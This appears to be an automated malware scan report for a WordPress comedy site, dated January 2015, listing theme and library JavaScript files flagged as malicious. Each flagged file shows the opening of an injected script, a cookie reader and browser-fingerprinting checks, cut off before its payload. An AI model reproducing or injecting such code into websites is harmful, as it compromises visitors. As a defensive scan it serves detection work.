Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thecomedygeniuses.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thecomedygeniuses.com/ | 200 OK Content-Length: 14924 Content-Type: text/html | clean |
http://thecomedygeniuses.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 95850 Content-Type: application/javascript | clean |
http://thecomedygeniuses.com/wp-content/themes/Chameleon/js/jquery.cycle.all.min.js?ver=1.0 | 200 OK Content-Length: 33035 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","Linux","Google","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(g Antivirus reports:
| ||
http://thecomedygeniuses.com/wp-content/themes/Chameleon/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=2.0 | 200 OK Content-Length: 13124 Content-Type: application/javascript | clean |
http://thecomedygeniuses.com/wp-content/themes/Chameleon/js/jquery.easing.1.3.js | 200 OK Content-Length: 9086 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","Linux","Google","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(g return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
| ||
http://thecomedygeniuses.com/wp-content/themes/Chameleon/js/superfish.js | 200 OK Content-Length: 4703 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","Linux","Google","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(g o.onHide.call($ul); return this; }, showSuperfishUl : function(){ var o = sf.op, sh = sf.c.shadowClass+'-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); Antivirus reports:
| ||
http://thecomedygeniuses.com/wp-content/themes/Chameleon/js/custom.js | 200 OK Content-Length: 5359 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","Linux","Google","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(g var et_label_text = jQuery(this).siblings('label').text(); if ( jQuery(this).siblings('span.required').length ) et_label_text += jQuery(this).siblings('span.required').text(); if (jQuery(this).val() === "") jQuery(this).val( et_label_text ); }); $comment_form.find('input#submit').click(function(){ if (jQuery("input#url").val() === jQuery("input#url").siblings('label').text()) jQuery("input#url").val(""); }); }); Antivirus reports:
| ||
http://thecomedygeniuses.com/wp-content/themes/Chameleon/js/jquery.fitvids.js?ver=1.0 | 200 OK Content-Length: 3528 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","Linux","Google","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(g var height = this.tagName.toLowerCase() == 'object' ? $this.attr('height') : $this.height(), aspectRatio = height / $this.width(); $this.wrap('<div class="fluid-width-video-wrapper" />').parent('.fluid-width-video-wrapper').css('padding-top', (aspectRatio * 100)+"%"); $this.removeAttr('height').removeAttr('width'); }); }); } })( jQuery ); Antivirus reports:
| ||
http://thecomedygeniuses.com/wp-content/themes/Chameleon/js/jquery.flexslider-min.js?ver=1.0 | 200 OK Content-Length: 12122 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","Linux","Google","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(g Antivirus reports:
| ||
http://thecomedygeniuses.com/wp-content/themes/Chameleon/js/et_flexslider.js?ver=1.0 | 200 OK Content-Length: 3723 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","Linux","Google","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(g footer_columns_num; footer_columns_num = et_container_width <= 768 ? 3 : 4; if ( $footer_widget.length ) { $footer_widget.removeClass('last').closest('#footer-widgets').find('div.clear').remove(); $footer_widget.each(function (index, domEle) { if ((index+1)%footer_columns_num == 0) jQuery(domEle).addClass("last").after("<div class='clear'></div>"); }); } } }); Antivirus reports:
| ||
http://thecomedygeniuses.com/wp-content/themes/Chameleon/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6717 Content-Type: application/javascript | clean |
http://thecomedygeniuses.com/wp-content/themes/Chameleon/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 | 200 OK Content-Length: 15647 Content-Type: application/javascript | clean |
http://thecomedygeniuses.com/wp-content/themes/Chameleon/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 5081 Content-Type: application/javascript | clean |
http://thecomedygeniuses.com/?page_id=39 | 200 OK Content-Length: 9992 Content-Type: text/html | clean |
http://thecomedygeniuses.com/wp-includes/js/comment-reply.js?ver=3.4 | 200 OK Content-Length: 1775 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","Linux","Google","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(g Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thecomedygeniuses.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 12:56:55 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://thecomedygeniuses.com/xmlrpc.php
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: thecomedygeniuses.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 12:56:55 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://thecomedygeniuses.com/xmlrpc.php
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: thecomedygeniuses.com
Referer: http://www.google.com/search?q=thecomedygeniuses.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thecomedygeniuses.com
Referer: http://www.google.com/search?q=thecomedygeniuses.com
Result:
The result is similar to the first query. There are no suspicious redirects found.